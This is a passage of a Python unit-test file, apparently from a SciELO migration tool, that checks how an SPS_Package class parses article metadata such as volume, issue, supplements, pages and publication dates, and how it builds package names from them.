"1234-5678-acron-volume-05-fpage-lpage-gf01.jpg", ) def test_asset_package_name_any_img(self): self.assertEqual( self.sps_package.asset_name("img.jpg"), "1234-5678-acron-volume-05-fpage-lpage-gimg.jpg", ) def test_journal_meta(self): self.assertEqual( self.sps_package.journal_meta, [ ("eissn", "1234-5678"), ("pissn", "0123-4567"), ("issn", "1234-5678"), ("acron", "acron"), ], ) def test_is_only_online_publication(self): self.assertEqual(self.sps_package.is_only_online_publication, False) def test_is_ahead_of_print_false(self): self.assertFalse(self.sps_package.is_ahead_of_print) class Test_SPS_Package_FirstVolNumFpageLpageIssue(unittest.TestCase): def setUp(self): """ Cria um XML com o items repetidos no nó ``article-meta``. """ article_meta_xml = """26 4 1393 1395 EVIDÊNCIAS científicas em homeopatia Revista de Homeopatia São Paulo 80 1-2 supl 1 122 Dossiê especial 2017 """ self.sps_package = sps_package(article_meta_xml) def test_parse_article_get_first_volume(self): """ Testa se a propriedade ``parse_article_meta`` garante que seja retornada sempre o ``volume`` do nó ``article-meta`` """ self.assertEqual( self.sps_package.parse_article_meta, [ ("volume", "26"), ("issue", "04"), ("fpage", "1393"), ("lpage", "1395"), ("year", "2010"), ("doi", "S0074-02761962000200006"), ("publisher-id", "S0074-02761962000200006"), ("other", "00006"), ], ) def test_parse_article_get_first_lpage(self): """ Testa se a propriedade ``parse_article_meta`` garante que seja retornada sempre o ``lpage`` do nó ``article-meta`` """ self.assertEqual( self.sps_package.parse_article_meta, [ ("volume", "26"), ("issue", "04"), ("fpage", "1393"), ("lpage", "1395"), ("year", "2010"), ("doi", "S0074-02761962000200006"), ("publisher-id", "S0074-02761962000200006"), ("other", "00006"), ], ) def test_parse_article_get_first_fpage(self): """ Testa se a propriedade ``parse_article_meta`` garante que seja retornada sempre o ``fpage`` do nó ``article-meta`` """ self.assertEqual( self.sps_package.parse_article_meta, [ ("volume", "26"), ("issue", "04"), ("fpage", "1393"), ("lpage", "1395"), ("year", "2010"), ("doi", "S0074-02761962000200006"), ("publisher-id", "S0074-02761962000200006"), ("other", "00006"), ], ) def test_parse_article_get_first_issue(self): """ Testa se a propriedade ``parse_article_meta`` garante que seja retornada sempre o ``issue`` do nó ``article-meta`` """ self.assertEqual( self.sps_package.parse_article_meta, [ ("volume", "26"), ("issue", "04"), ("fpage", "1393"), ("lpage", "1395"), ("year", "2010"), ("doi", "S0074-02761962000200006"), ("publisher-id", "S0074-02761962000200006"), ("other", "00006"), ], ) class Test_SPS_Package_VolFpageLpage(unittest.TestCase): def setUp(self): article_meta_xml = """volume fpage lpage """ self.sps_package = sps_package(article_meta_xml) def test_parse_article_meta_vol_fpage(self): self.assertEqual( self.sps_package.parse_article_meta, [ ("volume", "volume"), ("fpage", "fpage"), ("lpage", "lpage"), ("year", "2010"), ("doi", "S0074-02761962000200006"), ("publisher-id", "S0074-02761962000200006"), ("other", "00006"), ], ) def test_package_name_vol_fpage(self): self.assertEqual( self.sps_package.package_name, "1234-5678-acron-volume-fpage-lpage" ) def test_is_only_online_publication(self): self.assertEqual(self.sps_package.is_only_online_publication, False) def test_is_ahead_of_print_false(self): self.assertFalse(self.sps_package.is_ahead_of_print) class Test_SPS_Package_NumFpageLpage(unittest.TestCase): def setUp(self): article_meta_xml = """5 fpage lpage """ self.sps_package = sps_package(article_meta_xml) def test_parse_article_meta_num_fpage(self): self.assertEqual( self.sps_package.parse_article_meta, [ ("issue", "05"), ("fpage", "fpage"), ("lpage", "lpage"), ("year", "2010"), ("doi", "S0074-02761962000200006"), ("publisher-id", "S0074-02761962000200006"), ("other", "00006"), ], ) def test_package_name_num_fpage(self): self.assertEqual( self.sps_package.package_name, "1234-5678-acron-05-fpage-lpage" ) def test_is_only_online_publication(self): self.assertEqual(self.sps_package.is_only_online_publication, False) def test_is_ahead_of_print_false(self): self.assertFalse(self.sps_package.is_ahead_of_print) class Test_SPS_Package_VolNumSpeFpageLpage(unittest.TestCase): def setUp(self): article_meta_xml = """volume 5 spe fpage lpage """ self.sps_package = sps_package(article_meta_xml) def test_parse_article_meta_vol_num_spe_fpage(self): self.assertEqual( self.sps_package.parse_article_meta, [ ("volume", "volume"), ("issue", "05-spe"), ("fpage", "fpage"), ("lpage", "lpage"), ("year", "2010"), ("doi", "S0074-02761962000200006"), ("publisher-id", "S0074-02761962000200006"), ("other", "00006"), ], ) def test_supplement(self): self.assertEqual(self.sps_package.supplement, None) def test_number(self): self.assertEqual(self.sps_package.number, "5spe") def test_package_name_vol_num_spe_fpage(self): self.assertEqual( self.sps_package.package_name, "1234-5678-acron-volume-05-spe-fpage-lpage" ) def test_is_only_online_publication(self): self.assertEqual(self.sps_package.is_only_online_publication, False) def test_is_ahead_of_print_false(self): self.assertFalse(self.sps_package.is_ahead_of_print) class Test_SPS_Package_VolSpeNumFpageLpage(unittest.TestCase): def setUp(self): article_meta_xml = """volume spe num fpage lpage """ self.sps_package = sps_package(article_meta_xml) def test_parse_article_meta_vol_spe_num_fpage(self): self.assertEqual( self.sps_package.parse_article_meta, [ ("volume", "volume"), ("issue", "spenum"), ("fpage", "fpage"), ("lpage", "lpage"), ("year", "2010"), ("doi", "S0074-02761962000200006"), ("publisher-id", "S0074-02761962000200006"), ("other", "00006"), ], ) def test_package_name_vol_spe_num_fpage(self): self.assertEqual( self.sps_package.package_name, "1234-5678-acron-volume-spenum-fpage-lpage" ) def test_number(self): self.assertEqual(self.sps_package.number, "spenum") def test_is_only_online_publication(self): self.assertEqual(self.sps_package.is_only_online_publication, False) def test_is_ahead_of_print_false(self): self.assertFalse(self.sps_package.is_ahead_of_print) class Test_SPS_Package_VolSpeFpageLpage(unittest.TestCase): def setUp(self): article_meta_xml = """volume Especial fpage lpage """ self.sps_package = sps_package(article_meta_xml) def test_parse_article_meta_vol_spe_fpage(self): self.assertEqual( self.sps_package.parse_article_meta, [ ("volume", "volume"), ("issue", "spe"), ("fpage", "fpage"), ("lpage", "lpage"), ("year", "2010"), ("doi", "S0074-02761962000200006"), ("publisher-id", "S0074-02761962000200006"), ("other", "00006"), ], ) def test_package_name_vol_spe_fpage(self): self.assertEqual( self.sps_package.package_name, "1234-5678-acron-volume-spe-fpage-lpage" ) def test_is_only_online_publication(self): self.assertEqual(self.sps_package.is_only_online_publication, False) def test_is_ahead_of_print_false(self): self.assertFalse(self.sps_package.is_ahead_of_print) class Test_SPS_Package_VolSuplFpageLpage(unittest.TestCase): def setUp(self): article_meta_xml = """volume Suplemento fpage lpage """ self.sps_package = sps_package(article_meta_xml) def test_parse_article_meta_vol_suppl_fpage(self): self.assertEqual( self.sps_package.parse_article_meta, [ ("volume", "volume"), ("issue", "s0"), ("fpage", "fpage"), ("lpage", "lpage"), ("year", "2010"), ("doi", "S0074-02761962000200006"), ("publisher-id", "S0074-02761962000200006"), ("other", "00006"), ], ) def test_supplement(self): self.assertEqual(self.sps_package.supplement, "0") def test_number(self): self.assertIsNone(self.sps_package.number) def test_package_name_vol_suppl_fpage(self): self.assertEqual( self.sps_package.package_name, "1234-5678-acron-volume-s0-fpage-lpage" ) def test_is_only_online_publication(self): self.assertEqual(self.sps_package.is_only_online_publication, False) def test_is_ahead_of_print_false(self): self.assertFalse(self.sps_package.is_ahead_of_print) class Test_SPS_Package_VolSuplAFpageLpage(unittest.TestCase): def setUp(self): article_meta_xml = """volume Suplemento A fpage lpage """ self.sps_package = sps_package(article_meta_xml) def test_parse_article_meta_vol_suppl_a_fpage(self): self.assertEqual( self.sps_package.parse_article_meta, [ ("volume", "volume"), ("issue", "sa"), ("fpage", "fpage"), ("lpage", "lpage"), ("year", "2010"), ("doi", "S0074-02761962000200006"), ("publisher-id", "S0074-02761962000200006"), ("other", "00006"), ], ) def test_supplement(self): self.assertEqual(self.sps_package.supplement, "A") def test_number(self): self.assertIsNone(self.sps_package.number) def test_package_name_vol_suppl_a_fpage(self): self.assertEqual( self.sps_package.package_name, "1234-5678-acron-volume-sa-fpage-lpage" ) def test_is_only_online_publication(self): self.assertEqual(self.sps_package.is_only_online_publication, False) def test_is_ahead_of_print_false(self): self.assertFalse(self.sps_package.is_ahead_of_print) class Test_SPS_Package_VolSuplSpeFpageLpage(unittest.TestCase): def setUp(self): article_meta_xml = """volume Suplemento spe fpage lpage """ self.sps_package = sps_package(article_meta_xml) def test_parse_article_meta_vol_suppl_a_fpage(self): self.assertEqual( self.sps_package.parse_article_meta, [ ("volume", "volume"), ("issue", "sspe"), ("fpage", "fpage"), ("lpage", "lpage"), ("year", "2010"), ("doi", "S0074-02761962000200006"), ("publisher-id", "S0074-02761962000200006"), ("other", "00006"), ], ) def test_supplement(self): self.assertEqual(self.sps_package.supplement, "spe") def test_number(self): self.assertIsNone(self.sps_package.number) def test_package_name_vol_suppl_a_fpage(self): self.assertEqual( self.sps_package.package_name, "1234-5678-acron-volume-sspe-fpage-lpage" ) def test_is_only_online_publication(self): self.assertEqual(self.sps_package.is_only_online_publication, False) def test_is_ahead_of_print_false(self): self.assertFalse(self.sps_package.is_ahead_of_print) class Test_SPS_Package_VolNumSuplFpageLpage(unittest.TestCase): def setUp(self): article_meta_xml = """volume 2 Suplemento fpage lpage """ self.sps_package = sps_package(article_meta_xml) def test_parse_article_meta_vol_num_suppl_fpage(self): self.assertEqual( self.sps_package.parse_article_meta, [ ("volume", "volume"), ("issue", "02-s0"), ("fpage", "fpage"), ("lpage", "lpage"), ("year", "2010"), ("doi", "S0074-02761962000200006"), ("publisher-id", "S0074-02761962000200006"), ("other", "00006"), ], ) def test_supplement(self): self.assertEqual(self.sps_package.supplement, "0") def test_number(self): self.assertEqual(self.sps_package.number, "2") def test_package_name_vol_num_suppl_fpage(self): self.assertEqual( self.sps_package.package_name, "1234-5678-acron-volume-02-s0-fpage-lpage" ) def test_is_only_online_publication(self): self.assertEqual(self.sps_package.is_only_online_publication, False) def test_is_ahead_of_print_false(self): self.assertFalse(self.sps_package.is_ahead_of_print) class Test_SPS_Package_Vol2SuplAFpageLpage(unittest.TestCase): def setUp(self): article_meta_xml = """volume 2 Suplemento A fpage lpage """ self.sps_package = sps_package(article_meta_xml) def test_parse_article_meta_vol_num_suppl_a_fpage(self): self.assertEqual( self.sps_package.parse_article_meta, [ ("volume", "volume"), ("issue", "02-sa"), ("fpage", "fpage"), ("lpage", "lpage"), ("year", "2010"), ("doi", "S0074-02761962000200006"), ("publisher-id", "S0074-02761962000200006"), ("other", "00006"), ], ) def test_package_name_vol_num_suppl_a_fpage(self): self.assertEqual( self.sps_package.package_name, "1234-5678-acron-volume-02-sa-fpage-lpage" ) def test_documents_bundle_id(self): self.assertEqual( self.sps_package.documents_bundle_id, "1234-5678-acron-2010-volume-02-sa" ) def test_is_only_online_publication(self): self.assertEqual(self.sps_package.is_only_online_publication, False) def test_is_ahead_of_print_false(self): self.assertFalse(self.sps_package.is_ahead_of_print) class Test_SPS_Package_Vol5Elocation(unittest.TestCase): def setUp(self): article_meta_xml = """volume 5 elocation""" self.sps_package = sps_package(article_meta_xml) def test_parse_article_meta_vol_num_continuous_publication(self): self.assertEqual( self.sps_package.parse_article_meta, [ ("volume", "volume"), ("issue", "05"), ("elocation-id", "elocation"), ("year", "2010"), ("doi", "S0074-02761962000200006"), ("publisher-id", "S0074-02761962000200006"), ("other", "00006"), ], ) def test_package_name_vol_num_continuous_publication(self): self.assertEqual( self.sps_package.package_name, "1234-5678-acron-volume-05-elocation" ) def test_is_only_online_publication(self): self.assertEqual(self.sps_package.is_only_online_publication, True) def test_is_ahead_of_print_false(self): self.assertFalse(self.sps_package.is_ahead_of_print) class Test_SPS_Package_VolElocation(unittest.TestCase): def setUp(self): article_meta_xml = """volume elocation""" self.sps_package = sps_package(article_meta_xml) def test_parse_article_meta_vol_continuous_publication(self): self.assertEqual( self.sps_package.parse_article_meta, [ ("volume", "volume"), ("elocation-id", "elocation"), ("year", "2010"), ("doi", "S0074-02761962000200006"), ("publisher-id", "S0074-02761962000200006"), ("other", "00006"), ], ) def test_package_name_vol_continuous_publication(self): self.assertEqual( self.sps_package.package_name, "1234-5678-acron-volume-elocation" ) def test_documents_bundle_id(self): self.assertEqual( self.sps_package.documents_bundle_id, "1234-5678-acron-2010-volume" ) def test_is_only_online_publication(self): self.assertEqual(self.sps_package.is_only_online_publication, True) def test_is_ahead_of_print_false(self): self.assertFalse(self.sps_package.is_ahead_of_print) class Test_SPS_Package_Aop_HTML(unittest.TestCase): def setUp(self): article_meta_xml = """0 00""" self.sps_package = sps_package(article_meta_xml, doi="") def test_parse_article_meta_aop(self): self.assertEqual( self.sps_package.parse_article_meta, [ ("year", "2010"), ("publisher-id", "S0074-02761962000200006"), ("other", "00006"), ], ) def test_package_name_aop(self): self.assertEqual( self.sps_package.package_name, "1234-5678-acron-ahead-2010-00006" ) def test_is_only_online_publication(self): self.assertEqual(self.sps_package.is_only_online_publication, True) def test_is_ahead_of_print_true(self): self.assertTrue(self.sps_package.is_ahead_of_print) class Test_SPS_Package_Aop_XML(unittest.TestCase): def setUp(self): self.sps_package = sps_package("") def test_parse_article_meta_aop(self): self.assertEqual( self.sps_package.parse_article_meta, [ ("year", "2010"), ("doi", "S0074-02761962000200006"), ("publisher-id", "S0074-02761962000200006"), ("other", "00006"), ], ) def test_package_name_aop(self): self.assertEqual( self.sps_package.package_name, "1234-5678-acron-ahead-2010-S0074-02761962000200006", ) def test_documents_bundle_id(self): self.assertEqual(self.sps_package.documents_bundle_id, "1234-5678-acron-aop") def test_is_only_online_publication(self): self.assertEqual(self.sps_package.is_only_online_publication, True) def test_is_ahead_of_print_true(self): self.assertTrue(self.sps_package.is_ahead_of_print) class Test_SPS_Package_Article_HTML(unittest.TestCase): def setUp(self): article_meta_xml = """200 00""" self.sps_package = sps_package(article_meta_xml, doi="") def test_parse_article_meta(self): self.assertEqual( self.sps_package.parse_article_meta, [ ("volume", "20"), ("year", "2010"), ("publisher-id", "S0074-02761962000200006"), ("other", "00006"), ], ) def test_supplement(self): self.assertEqual(self.sps_package.supplement, None) def test_number(self): self.assertEqual(self.sps_package.number, None) def test_package_name(self): self.assertEqual(self.sps_package.package_name, "1234-5678-acron-20-00006") def test_documents_bundle_id(self): self.assertEqual( self.sps_package.documents_bundle_id, "1234-5678-acron-2010-20" ) def test_is_only_online_publication(self): self.assertEqual(self.sps_package.is_only_online_publication, False) def test_is_ahead_of_print_false(self): self.assertFalse(self.sps_package.is_ahead_of_print) class Test_ArticleMetaCount(unittest.TestCase): def setUp(self): xml = """
TEXTO
""" xmltree = etree.fromstring(xml) self.sps_package = SPS_Package(xmltree, None) def test__transform_article_meta_count(self): result = self.sps_package.transform_article_meta_count() self.assertIsNone(result.find(".//counts")) class Test_ArticleMetaPublisherId(unittest.TestCase): def setUp(self): article_meta_xml = """
""" article_ids = """ S0074-02761962000200006 00006 """ xml = utils.build_xml(article_meta_xml, "", article_ids=article_ids) xmltree = etree.fromstring(xml) self.sps_package = SPS_Package(xmltree) def test_publisher_id(self): self.assertEqual(self.sps_package.publisher_id, "S0074-02761962000200006") class Test_ArticleMetaNoPublisherId(unittest.TestCase): def setUp(self): article_meta_xml = """
""" article_ids = """ 00006 """ xml = utils.build_xml(article_meta_xml, "", article_ids=article_ids) xmltree = etree.fromstring(xml) self.sps_package = SPS_Package(xmltree) def test_publisher_id(self): self.assertIsNone(self.sps_package.publisher_id) class Test_ArticleMetaAOPPID(unittest.TestCase): def setUp(self): article_meta_xml = """
""" article_ids = """ S0074-02761962000200006 S0074-02761962005000001 00006 """ xml = utils.build_xml(article_meta_xml, "", article_ids=article_ids) xmltree = etree.fromstring(xml) self.sps_package = SPS_Package(xmltree) def test_aop_pid(self): self.assertEqual(self.sps_package.aop_pid, "S0074-02761962005000001") def test_change_aop_pid(self): self.sps_package.aop_pid = "S0074-02761962005000001" self.assertEqual(self.sps_package.aop_pid, "S0074-02761962005000001") class Test_ArticleMetaNoAOPPID(unittest.TestCase): def setUp(self): article_meta_xml = """
""" article_ids = """ S0074-02761962000200006 00006 """ xml = utils.build_xml(article_meta_xml, "", article_ids=article_ids) xmltree = etree.fromstring(xml) self.sps_package = SPS_Package(xmltree) def test_aop_pid(self): self.assertIsNone(self.sps_package.aop_pid) def test_set_aop_pid(self): self.sps_package.aop_pid = "S0074-02761962005000001" self.assertEqual(self.sps_package.aop_pid, "S0074-02761962005000001") class Test_ArticleMetaScieloPIDV1(unittest.TestCase): def setUp(self): article_meta_xml = """
""" article_ids = """ 12345(1995) 00006 """ xml = utils.build_xml(article_meta_xml, "", article_ids=article_ids) xmltree = etree.fromstring(xml) self.sps_package = SPS_Package(xmltree) def test_scielo_pid_v1(self): self.assertIsNotNone(self.sps_package.scielo_pid_v1) self.assertEqual(self.sps_package.scielo_pid_v1, "12345(1995)") def test_set_scielo_pid_v1(self): self.sps_package.scielo_pid_v1 = "1234-5678(1995)0001" self.assertEqual(self.sps_package.scielo_pid_v1, "1234-5678(1995)0001") class Test_ArticleMetaNoPIDScieloV1(unittest.TestCase): def setUp(self): article_meta_xml = """
""" article_ids = """ S0101-02022011009000001 00006 """ xml = utils.build_xml(article_meta_xml, "", article_ids=article_ids) xmltree = etree.fromstring(xml) self.sps_package = SPS_Package(xmltree) def test_scielo_pid_v1(self): self.assertIsNone(self.sps_package.scielo_pid_v1) class Test_ArticleMetaPIDScieloV2(unittest.TestCase): def setUp(self): article_meta_xml = """
""" article_ids = """ S0101-02022011009000001 00006 """ xml = utils.build_xml(article_meta_xml, "", article_ids=article_ids) xmltree = etree.fromstring(xml) self.sps_package = SPS_Package(xmltree) def test_scielo_pid_v2(self): self.assertIsNotNone(self.sps_package.scielo_pid_v2) self.assertEqual(self.sps_package.scielo_pid_v2, "S0101-02022011009000001") def test_set_scielo_pid_v2(self): self.sps_package.scielo_pid_v2 = "S0101-02022011009000001" self.assertEqual(self.sps_package.scielo_pid_v2, "S0101-02022011009000001") class Test_ArticleMetaNoPIDScieloV2(unittest.TestCase): def setUp(self): article_meta_xml = """
""" article_ids = """ 12345(1995) 00006 """ xml = utils.build_xml(article_meta_xml, "", article_ids=article_ids) xmltree = etree.fromstring(xml) self.sps_package = SPS_Package(xmltree) def test_scielo_pid_v2(self): self.assertIsNone(self.sps_package.scielo_pid_v2) class Test_ArticleMetaPIDScieloV3(unittest.TestCase): def setUp(self): article_meta_xml = """
""" article_ids = """ cdmqrXxyd3DRjr88hpGQPLx 00006 """ xml = utils.build_xml(article_meta_xml, "", article_ids=article_ids) xmltree = etree.fromstring(xml) self.sps_package = SPS_Package(xmltree) def test_scielo_pid_v3(self): self.assertIsNotNone(self.sps_package.scielo_pid_v3) self.assertEqual(self.sps_package.scielo_pid_v3, "cdmqrXxyd3DRjr88hpGQPLx") def test_set_scielo_pid_v3(self): self.sps_package.scielo_pid_v3 = "cdmqrXxyd3DRjr88hpGQ123" self.assertEqual(self.sps_package.scielo_pid_v3, "cdmqrXxyd3DRjr88hpGQ123") class Test_ArticleMetaNoPIDScieloV3(unittest.TestCase): def setUp(self): article_meta_xml = """
""" article_ids = """ S0101-02022011009000001 00006 """ xml = utils.build_xml(article_meta_xml, "", article_ids=article_ids) xmltree = etree.fromstring(xml) self.sps_package = SPS_Package(xmltree) def test_scielo_pid_v3(self): self.assertIsNone(self.sps_package.scielo_pid_v3) class Test_DocumentPubdateSPS1_9(unittest.TestCase): def setUp(self): self.xml = """
201223
""" xmltree = etree.fromstring(self.xml) self.sps_package = SPS_Package(xmltree, None) def test_document_pubdate(self): self.assertEqual(self.sps_package.document_pubdate, ("", "", "")) def test_set_document_pubdate(self): self.sps_package.document_pubdate = ("2010", "07", "20") self.assertEqual(self.sps_package.document_pubdate, ("2010", "07", "20")) def test_set_incomplete_document_pubdate(self): self.sps_package.document_pubdate = ("2010", "", "") self.assertEqual(self.sps_package.document_pubdate, ("2010", "", "")) class Test_DocumentPubdateSPS1_8(unittest.TestCase): def setUp(self): self.xml = """
201223
""" xmltree = etree.fromstring(self.xml) self.sps_package = SPS_Package(xmltree, None) def test_document_pubdate(self): self.assertEqual(self.sps_package.document_pubdate, ("2012", "02", "03")) def test_set_document_pubdate(self): self.sps_package.document_pubdate = ("2010", "07", "20") self.assertEqual(self.sps_package.document_pubdate, ("2010", "07", "20")) def test_set_incomplete_document_pubdate(self): self.sps_package.document_pubdate = ("2010", "", "") self.assertEqual(self.sps_package.document_pubdate, ("2010", "", "")) class Test_DocumentPubdateSPS1_4(unittest.TestCase): def setUp(self): self.xml = """
20122
""" xmltree = etree.fromstring(self.xml) self.sps_package = SPS_Package(xmltree, None) def test_document_pubdate(self): self.assertEqual(self.sps_package.document_pubdate, ("2012", "02", "")) def test_set_document_pubdate(self): self.sps_package.document_pubdate = ("2010", "07", "20") self.assertEqual(self.sps_package.document_pubdate, ("2010", "07", "20")) def test_set_incomplete_document_pubdate(self): self.sps_package.document_pubdate = ("2010", "", "") self.assertEqual(self.sps_package.document_pubdate, ("2010", "", "")) class Test_DocumentsBundlePubdateSPS1_9(unittest.TestCase): def setUp(self): self.xml = """
2010513
""" xmltree = etree.fromstring(self.xml) self.sps_package = SPS_Package(xmltree, None) def test_documents_bundle_pubdate(self): self.assertEqual(self.sps_package.documents_bundle_pubdate, ("", "", "")) def test_set_documents_bundle_pubdate(self): self.sps_package.documents_bundle_pubdate = ("2012", "10", "21") self.assertEqual(self.sps_package.documents_bundle_pubdate, ("2012", "10", "21")) def test_set_incomplete_documents_bundle_pubdate(self): self.sps_package.documents_bundle_pubdate = ("2012", "", "") self.assertEqual(self.sps_package.documents_bundle_pubdate, ("2012", "", "")) def test_set_documents_bundle_pubdate_to_none(self): self.xml = """
20105
""" xmltree = etree.fromstring(self.xml) self.sps_package = SPS_Package(xmltree, None) self.sps_package.documents_bundle_pubdate = None self.assertEqual(self.sps_package.documents_bundle_pubdate, ("", "", "")) class Test_DocumentsBundlePubdateSPS1_8(unittest.TestCase): def setUp(self): self.xml = """
2010513
""" xmltree = etree.fromstring(self.xml) self.sps_package = SPS_Package(xmltree, None) def test_documents_bundle_pubdate(self): self.assertEqual(self.sps_package.documents_bundle_pubdate, ("", "", "")) def test_set_documents_bundle_pubdate(self): self.sps_package.documents_bundle_pubdate = ("2012", "10", "21") self.assertEqual(self.sps_package.documents_bundle_pubdate, ("2012", "10", "21")) def test_set_incomplete_documents_bundle_pubdate(self): self.sps_package.documents_bundle_pubdate = ("2012", "", "") self.assertEqual(self.sps_package.documents_bundle_pubdate, ("2012", "", "")) def test_set_documents_bundle_pubdate_to_none(self): self.xml = """
20105
""" xmltree = etree.fromstring(self.xml) self.sps_package = SPS_Package(xmltree, None) self.sps_package.documents_bundle_pubdate = None self.assertEqual(self.sps_package.documents_bundle_pubdate, ("", "", "")) class Test_DocumentsBundlePubdateSPS1_4(unittest.TestCase): def setUp(self): self.xml = """
2010513
""" xmltree = etree.fromstring(self.xml) self.sps_package = SPS_Package(xmltree, None) def test_documents_bundle_pubdate(self): self.assertEqual(self.sps_package.documents_bundle_pubdate, ("", "", "")) def test_set_documents_bundle_pubdate(self): self.sps_package.documents_bundle_pubdate = ("2012", "10", "21") self.assertEqual(self.sps_package.documents_bundle_pubdate, ("2012", "10", "21")) def test_set_incomplete_documents_bundle_pubdate(self): self.sps_package.documents_bundle_pubdate = ("2012", "", "") self.assertEqual(self.sps_package.documents_bundle_pubdate, ("2012", "", "")) def test_set_documents_bundle_pubdate_to_none(self): self.xml = """
20105
""" xmltree = etree.fromstring(self.xml) self.sps_package = SPS_Package(xmltree, None) self.sps_package.documents_bundle_pubdate = None self.assertEqual(self.sps_package.documents_bundle_pubdate, ("", "", "")) @mock.patch( "documentstore_migracao.export.sps_package.SPS_Package._move_appendix_from_body_to_back" ) @mock.patch( "documentstore_migracao.export.sps_package.SPS_Package.transform_pubdate" ) class TestTransformContent(unittest.TestCase): def setUp(self): self.xml = """

""" xmltree = etree.fromstring(self.xml) self.app_ids = [f"anx0{num}" for num in range(1, 3)] self.sps_package = SPS_Package(xmltree, None) self.body = self.sps_package.xmltree.find("./body") self.back = self.sps_package.xmltree.find("./back") def test_calls_transform_pubdate( self, mk_transform_pubdate, mk_sps_package_move_appedix ): self.sps_package.transform_content() mk_transform_pubdate.assert_called_once() def test_calls_moves_appendix_from_body_to_back( self, mk_transform_pubdate, mk_sps_package_move_appedix ): self.sps_package.transform_content() mk_sps_package_move_appedix.assert_called_once() class TestCompletePubDate(unittest.TestCase): def setUp(self): self.xml = """
S0074-02761962000200006 {volume} {issue} {pub_date_collection} {pub_date_pub}
""" def test_adds_document_pubdate_if_date_not_in_xml(self): volume = "50" issue = "1" pub_date_collection = """ 2010 """ xml_txt = self.xml.format( volume=volume, issue=issue, pub_date_collection=pub_date_collection, pub_date_pub="", ) xmltree = etree.fromstring(xml_txt) xml_sps = SPS_Package(xmltree, None) xml_sps.complete_pub_date(("2020", "01", "24"), None) self.assertEqual(xml_sps.document_pubdate, ("2020", "01", "24")) self.assertEqual(xml_sps.documents_bundle_pubdate, ("2010", "", "")) def test_does_not_change_document_pubdate_if_document_pubdate_is_none(self): volume = "50" issue = "1" pub_date_collection = """ 2010 """ xml_txt = self.xml.format( volume=volume, issue=issue, pub_date_collection=pub_date_collection, pub_date_pub="", ) xmltree = etree.fromstring(xml_txt) xml_sps = SPS_Package(xmltree, None) xml_sps.complete_pub_date(None, None) self.assertEqual(xml_sps.document_pubdate, ("", "", "")) self.assertEqual(xml_sps.documents_bundle_pubdate, ("2010", "", "")) def test_fixes_bundle_pubdate_if_it_is_aop(self): pub_date_collection = """ 2010513 """ xml_txt = self.xml.format( volume="", issue="", pub_date_collection=pub_date_collection, pub_date_pub="", ) xmltree = etree.fromstring(xml_txt) xml_sps = SPS_Package(xmltree, None) xml_sps.complete_pub_date(("2020", "01", "24"), ("1997", "03", "")) self.assertEqual(xml_sps.document_pubdate, ("2020", "01", "24")) self.assertEqual(xml_sps.documents_bundle_pubdate, ("", "", "")) def test_adds_bundle_pubdate_if_date_not_in_xml(self): volume = "50" issue = "1" pub_date_pub = """ 2010513 """ xml_txt = self.xml.format( volume=volume, issue=issue, pub_date_collection="", pub_date_pub=pub_date_pub, ) xmltree = etree.fromstring(xml_txt) xml_sps = SPS_Package(xmltree, None) xml_sps.complete_pub_date(("2010", "05", "13"), ("1997", "03", "")) self.assertEqual(xml_sps.document_pubdate, ("2010", "05", "13")) self.assertEqual(xml_sps.documents_bundle_pubdate, ("1997", "03", "")) class TestOriginalLanguage(unittest.TestCase): def setUp(self): self.xml = """{article_tag} S0074-02761962000200006 """ def test_returns_none_if_lang_attr_not_set(self): article_tag = '
' xml_txt = self.xml.format(article_tag=article_tag) xmltree = etree.fromstring(xml_txt) xml_sps = SPS_Package(xmltree) self.assertIsNone(xml_sps.original_language) def test_returns_lang_if_it_is_set(self): article_tag = '
' xml_txt = self.xml.format(article_tag=article_tag) xmltree = etree.fromstring(xml_txt) xml_sps = SPS_Package(xmltree) self.assertEqual(xml_sps.original_language, "pt") def test_sets_value(self): article_tag = '
' xml_txt = self.xml.format(article_tag=article_tag) xmltree = etree.fromstring(xml_txt) xml_sps = SPS_Package(xmltree) xml_sps.original_language = "en" self.assertEqual(xml_sps.original_language, "en") class TestMoveAppendixFromBodyToBack(unittest.TestCase): def setUp(self): self.xml = """

""" xmltree = etree.fromstring(self.xml) self.app_ids = [f"anx0{num}" for num in range(1, 3)] self.sps_package = SPS_Package(xmltree, None) def test_body_without_appedix(self): self.sps_package._move_appendix_from_body_to_back() self.assertEqual(len(self.sps_package.xmltree.findall("./body//app-group")), 0) def test_back_with_appedix(self): self.sps_package._move_appendix_from_body_to_back() app_group_tags = self.sps_package.xmltree.findall(".//back//app-group") self.assertEqual(len(app_group_tags), 2) for app_group_tag in app_group_tags: self.assertIn(app_group_tag.find("app").attrib["id"], self.app_ids) class TestMoveAppendixFromBodyToBackWithSubArticle(unittest.TestCase): def setUp(self): self.xml = """

""" xmltree = etree.fromstring(self.xml) self.app_ids = [f"anx0{num}" for num in range(1, 5)] self.sps_package = SPS_Package(xmltree, None) def test_from_body_to_back_article_data(self): self.sps_package._move_appendix_from_body_to_back() self.assertEqual(len(self.sps_package.xmltree.findall("./body//app-group")), 0) app_group_tags = self.sps_package.xmltree.findall("./back//app-group") self.assertEqual(len(app_group_tags), 2) for app_group_tag in app_group_tags: self.assertIn(app_group_tag.find("app").attrib["id"], self.app_ids[:2]) def test_from_body_to_back_sub_article_data(self): self.sps_package._move_appendix_from_body_to_back() self.assertEqual( len(self.sps_package.xmltree.findall("./sub-article//body//app-group")), 0 ) app_group_tags = self.sps_package.xmltree.findall( "./sub-article//back//app-group" ) self.assertEqual(len(app_group_tags), 2) for app_group_tag in app_group_tags: self.assertIn(app_group_tag.find("app").attrib["id"], self.app_ids[2:]) class TestMoveAppendixFromBodyToBackWithSubArticleAndBacks(unittest.TestCase): def setUp(self): self.xml = """

Article Title

""" xmltree = etree.fromstring(self.xml) self.app_ids = [f"anx0{num}" for num in range(1, 5)] self.sps_package = SPS_Package(xmltree, None) def test_from_body_to_back_article_data(self): self.sps_package._move_appendix_from_body_to_back() self.assertEqual(len(self.sps_package.xmltree.findall("./body//app-group")), 0) app_group_tags = self.sps_package.xmltree.findall("./back//app-group") self.assertEqual(len(app_group_tags), 2) for app_group_tag in app_group_tags: self.assertIn(app_group_tag.find("app").attrib["id"], self.app_ids[:2]) def test_from_body_to_back_sub_article_data(self): self.sps_package._move_appendix_from_body_to_back() self.assertEqual( len(self.sps_package.xmltree.findall("./sub-article//body//app-group")), 0 ) app_group_tags = self.sps_package.xmltree.findall( "./sub-article//back//app-group" ) self.assertEqual(len(app_group_tags), 2) for app_group_tag in app_group_tags: self.assertIn(app_group_tag.find("app").attrib["id"], self.app_ids[2:]) class TestUpdateMixedCitations(unittest.TestCase): def setUp(self): 